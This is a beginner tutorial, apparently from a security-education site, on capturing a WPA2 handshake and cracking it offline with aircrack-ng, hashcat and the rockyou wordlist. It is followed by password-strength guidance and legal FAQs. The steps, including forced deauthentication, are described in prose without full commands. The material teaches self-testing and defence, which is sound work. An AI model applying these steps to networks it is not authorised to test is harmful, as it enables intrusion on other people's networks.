WiFi cracking is probably why most of you ended up on this site. That’s fine — it’s also genuinely one of the best ways to start understanding how cryptography, authentication, and network protocols work. So we’re going to do it properly.
Here’s my promise to you as your teacher: I’m not going to water this down. You’re going to understand exactly what’s happening at each step — not just type commands and hope they work. And when we’re done, you’re going to test your own network and find out whether your WiFi password would last five seconds or five hundred years against this attack.
- Kali Linux (VM, live USB, or native install) — our installation guide
- A wireless adapter that supports monitor mode (Alfa AWUS036ACH is the standard recommendation)
- Your own WiFi network to test — or a lab network you control
- About 30 minutes
How WPA2 Actually Works — And Why You MUST Understand This First
I know you want to jump straight to the terminal. I know. But I’m asking you to read this section first, because students who skip it always get stuck and don’t understand why their attack failed.
WPA2 uses something called a 4-way handshake. When your phone connects to your router, they exchange a series of packets to authenticate each other. Here’s the key insight: this handshake doesn’t contain the password in plain text — but it contains enough cryptographic information to verify whether a guess is correct.
Think of it like a padlock. We don’t have the key, but we have the padlock. We can try keys one by one without needing to touch the lock mechanism — we just see if it opens. The handshake is the padlock. Our wordlist is the bag of keys.
This is called an offline dictionary attack. We capture the handshake once, take it away, and test billions of password guesses against it at full GPU speed. No lockouts. No rate limiting. That’s why your password quality is everything.
Step 1: Enable Monitor Mode on Your Wireless Adapter
Your wireless card normally only pays attention to packets addressed to your device — like how you tune out conversations that aren’t directed at you. Monitor mode is the equivalent of listening to every conversation in the room simultaneously. We need it to capture the handshake between other devices and the router.
Important student note: not all wireless adapters support monitor mode. Built-in laptop WiFi cards usually don’t. The Alfa AWUS036ACH is the community standard recommendation for this. Check yours first with iwconfig.
Step 2: Scan the Area and Identify Your Network
Now we’re going to look at the WiFi landscape around us. This step teaches you something important: your WiFi adapter can see a lot more than your phone’s WiFi settings show you. The raw view from airodump-ng is much richer — BSSID (router MAC address), signal strength, channel, encryption type, and connected clients.
Step 3: Capture the Handshake
This is the critical step. We need to capture the moment a device authenticates with your router. You have two options: wait patiently for a device to naturally connect (could take a while), or send a deauthentication packet to force a connected device to reconnect. We’ll do both so you understand each approach.
Students often ask: “does the deauth hurt the device?” No — it’s the equivalent of briefly turning WiFi off and on again. The device reconnects automatically within seconds.
Step 4: Run the Dictionary Attack
Here’s where it gets satisfying. We’ve captured the handshake — now we run password guesses against it. Your first instinct might be to write a clever password guesser. Don’t. The rockyou.txt wordlist that comes with Kali already contains 14 million real-world passwords from previous breaches. Real humans’s real passwords. If your target password is anything humans typically choose, it’s probably in there.
Step 5: Try hashcat for GPU-Accelerated Cracking
aircrack-ng uses your CPU. hashcat uses your GPU, which is orders of magnitude faster for this kind of work.
What This Means for Your Own WiFi — The Honest Lesson
Now comes the teachable moment. The most important thing I want you to take from this class isn’t the commands — it’s this table. Look at it carefully. Understand viscerally why password length and randomness matter. Because the difference between “cracked in 3 seconds” and “effectively uncrackable” is just a few extra random characters.
| Password Example | Time to Crack (GPU) | Verdict |
|---|---|---|
| password123 | Instant | In wordlist |
| summer2019 | 3 seconds | In wordlist |
| MyDog2018! | 2-48 hours | Weak |
| Tr0ub4dor&3 | Weeks-months | Moderate |
| k#9mP!vL2@qR7nX | Centuries | Strong |
How to Actually Secure Your WiFi
- Use WPA3 — if your router supports it, enable it. WPA3 is resistant to offline dictionary attacks because of how its handshake works
- Generate a random password — 15+ characters, mixed case, numbers, symbols. Write it on a sticky note on your router if you have to. That’s fine. Random is what matters, not memorable
- Disable WPS — WiFi Protected Setup has known vulnerabilities that bypass password strength entirely. Turn it off in your router settings
- Check connected devices regularly — your router’s admin panel shows every connected device. Anything you don’t recognise should be investigated and blocked
- Guest network for visitors — give guests their own isolated network with a separate password, keeping your main network private
Want to understand the full picture of network security? Our Network Security guide covers everything from packet analysis to MITM attacks. And if you want to go deeper on Kali Linux tools, check our Kali Linux Tools guide.
Frequently Asked Questions
Is it illegal to use aircrack-ng on someone else’s network?
Yes, absolutely. Accessing a WiFi network without authorisation violates the Computer Fraud and Abuse Act (USA), the Computer Misuse Act (UK), and equivalent laws in virtually every country. These are criminal offences, not civil ones. Only test on your own network or one you have explicit written permission to test.
Can WPA3 be cracked the same way?
No. WPA3 uses Simultaneous Authentication of Equals (SAE) instead of the 4-way handshake, which prevents offline dictionary attacks. The attacker would need to be present for every guess, making brute-force attacks dramatically slower and impractical.
Can my ISP tell if someone hacked my WiFi?
Your ISP can see unusual traffic patterns, but they don’t actively monitor for WiFi intrusion. You’d notice it more easily by checking your router’s connected devices list.
Can WiFi passwords be hacked using Kali Linux?
Yes, WiFi passwords can be tested using Kali Linux tools like aircrack-ng, but only in controlled environments. Ethical hackers use this method to identify weak passwords and improve network security. Unauthorized access to any network is illegal.
What is the easiest way to test WiFi security in Kali Linux?
The most common method is capturing a WPA/WPA2 handshake using tools like airodump-ng and then performing a dictionary-based password audit. This helps determine if your WiFi password is strong or vulnerable.
How can I protect my WiFi from hackers?
Use WPA3 encryption, create a strong password (16+ characters), disable WPS, update router firmware regularly, and avoid default credentials.
